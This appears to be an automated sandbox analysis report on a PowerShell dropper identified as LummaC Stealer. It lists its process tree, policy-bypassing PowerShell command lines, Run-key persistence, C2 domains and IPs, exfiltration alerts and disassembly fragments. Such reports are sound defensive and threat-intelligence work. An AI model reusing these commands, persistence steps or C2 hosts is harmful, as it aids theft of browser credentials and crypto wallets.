Edit tour

Windows Analysis Report
gkzHdqfg.ps1

Overview

General Information

Sample name:	gkzHdqfg.ps1
Analysis ID:	1561012
MD5:	d71c930452ae704ac29ec1e5e4586fe3
SHA1:	8651de4941bb4660fb3b3ae9442a8f6fcda2d51f
SHA256:	ee27463e66262cb5be6a087222573b30516fa70b911e359e469e7cc03427e38c
Tags:	ps1user-malrpt
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Powershell drops PE file

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: Suspicious Script Execution From Temp Folder

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

powershell.exe (PID: 2676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gkzHdqfg.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Set-up.exe (PID: 5700 cmdline: "C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)

more.com (PID: 1700 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)

conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 2208 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)

powershell.exe (PID: 648 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\ZZJTWAOIXLEHV8HOYD0ZL8WGES83EVQ.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Set-up.exe (PID: 3684 cmdline: "C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)

Set-up.exe (PID: 5408 cmdline: "C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["candidatersz.cyou", "peepburry828.sbs", "p3ar11fter.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs", "processhol.sbs"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000008.00000003.2056776253.00000000032FA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000003.2136313651.00000000032A0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000003.2136183716.0000000003306000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\ZZJTWAOIXLEHV8HOYD0ZL8WGES83EVQ.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\ZZJTWAOIXLEHV8HOYD0ZL8WGES83EVQ.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2208, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\ZZJTWAOIXLEHV8HOYD0ZL8WGES83EVQ.ps1", ProcessId: 648, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\ZZJTWAOIXLEHV8HOYD0ZL8WGES83EVQ.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\ZZJTWAOIXLEHV8HOYD0ZL8WGES83EVQ.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 2208, ParentProcessName: msiexec.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\ZZJTWAOIXLEHV8HOYD0ZL8WGES83EVQ.ps1", ProcessId: 648, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gkzHdqfg.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gkzHdqfg.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gkzHdqfg.ps1", ProcessId: 2676, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2676, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 104.21.56.6, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2208, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2676, TargetFilename: C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvdisps.dll

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gkzHdqfg.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gkzHdqfg.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gkzHdqfg.ps1", ProcessId: 2676, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T16:35:39.259623+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	104.21.56.6	443	TCP
2024-11-22T16:35:41.352202+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.56.6	443	TCP
2024-11-22T16:35:43.807140+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.56.6	443	TCP
2024-11-22T16:35:46.588655+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.56.6	443	TCP
2024-11-22T16:35:48.976324+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	104.21.56.6	443	TCP
2024-11-22T16:35:51.684785+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.56.6	443	TCP
2024-11-22T16:35:54.265251+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.56.6	443	TCP
2024-11-22T16:35:57.212940+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	104.21.56.6	443	TCP
2024-11-22T16:35:59.275497+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	172.67.75.40	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T16:35:39.957725+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49736	104.21.56.6	443	TCP
2024-11-22T16:35:42.068550+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	104.21.56.6	443	TCP
2024-11-22T16:35:57.908420+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49743	104.21.56.6	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T16:35:39.957725+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49736	104.21.56.6	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T16:35:42.068550+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49737	104.21.56.6	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T16:35:47.336423+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49739	104.21.56.6	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T16:35:54.273670+0100	2843864	1	A Network Trojan was detected	192.168.2.4	49742	104.21.56.6	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: exdefo.6.dr

Malware Configuration Extractor: LummaC {"C2 url": ["candidatersz.cyou", "peepburry828.sbs", "p3ar11fter.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs", "processhol.sbs"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\exdefo

ReversingLabs: Detection: 51%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000006.00000002.2013676054.0000000005560000.00000004.00001000.00020000.00000000.sdmp	String decryptor: p3ar11fter.sbs
Source: 00000006.00000002.2013676054.0000000005560000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 3xp3cts1aim.sbs
Source: 00000006.00000002.2013676054.0000000005560000.00000004.00001000.00020000.00000000.sdmp	String decryptor: peepburry828.sbs
Source: 00000006.00000002.2013676054.0000000005560000.00000004.00001000.00020000.00000000.sdmp	String decryptor: p10tgrace.sbs
Source: 00000006.00000002.2013676054.0000000005560000.00000004.00001000.00020000.00000000.sdmp	String decryptor: processhol.sbs
Source: 00000006.00000002.2013676054.0000000005560000.00000004.00001000.00020000.00000000.sdmp	String decryptor: candidatersz.cyou
Source: 00000006.00000002.2013676054.0000000005560000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000006.00000002.2013676054.0000000005560000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000006.00000002.2013676054.0000000005560000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000006.00000002.2013676054.0000000005560000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000006.00000002.2013676054.0000000005560000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 8_2_02EF938B CryptUnprotectData,

8_2_02EF938B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Users\user\AppData\Roaming\QHUPRmIp\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.4:49744 version: TLS 1.2

Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160212C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009DA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: msvcr100.i386.pdb source: Set-up.exe
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602380000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020E6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C78000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216021A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602171000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: more.com, 00000006.00000002.2011662498.0000000004B19000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600A0A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: more.com, 00000006.00000002.2011662498.0000000004B19000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216029A9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BA0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160205B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wlanutil.pdb source: msiexec.exe
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600B15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B44000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB581A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	9_2_6BB581A1
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB8C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	9_2_6BB8C8FD
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB8CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	9_2_6BB8CC23

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\3D Objects	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Packages	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Mozilla	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\PeerDistRepub	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx-17h]	8_2_02EEB330
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx]	8_2_02F1B9D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]	8_2_02F1B9D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp eax	8_2_02F0E2F4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov byte ptr [edx], al	8_2_02F0D20D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov edi, ecx	8_2_02F0D20D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then add ecx, edi	8_2_02F0D20D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov word ptr [ecx], bp	8_2_02EFF2FE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+04h]	8_2_02EFF2FE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebx, dx	8_2_02F0EAEC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edx-3E4A35F2h]	8_2_02F1FAC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp eax	8_2_02F1FAC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+28h]	8_2_02EFE2D1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then cmp byte ptr [edx+ecx+01h], 00000000h	8_2_02F0B2B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then test eax, eax	8_2_02F1C280
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov byte ptr [ebx], cl	8_2_02F0E268
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+000000A8h]	8_2_02F0E268
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx+63h]	8_2_02F0E268
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebx, bx	8_2_02F0524C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_02F16220
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov byte ptr [edx], al	8_2_02F0D214
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov edi, ecx	8_2_02F0D214
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov edi, eax	8_2_02EFD200
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+37313F03h]	8_2_02EFC3E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then lea eax, dword ptr [esi+ebx]	8_2_02EEBBDF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then add ebx, edi	8_2_02F073C5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0CD16723h]	8_2_02EFBBAB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi-5DD2027Ah]	8_2_02EE9390
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov byte ptr [edx], cl	8_2_02EE9390
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp eax	8_2_02F0E343
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp eax	8_2_02F0E331
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov word ptr [ecx], bp	8_2_02EFF315
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+04h]	8_2_02EFF315
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+ecx-57h]	8_2_02F040E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	8_2_02F0A8C6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov byte ptr [edi], bl	8_2_02EE90D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h	8_2_02F05890
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 40915FE0h	8_2_02F211C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 4F699CD4h	8_2_02F219C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov byte ptr [ebx], dl	8_2_02F0C190
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edx-3E4A35F2h]	8_2_02F1F990
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp eax	8_2_02F1F990
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+0F253B13h]	8_2_02F05972
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+eax+00000080h]	8_2_02F05972
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov byte ptr [ebx], al	8_2_02F0C97F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp eax	8_2_02F05960
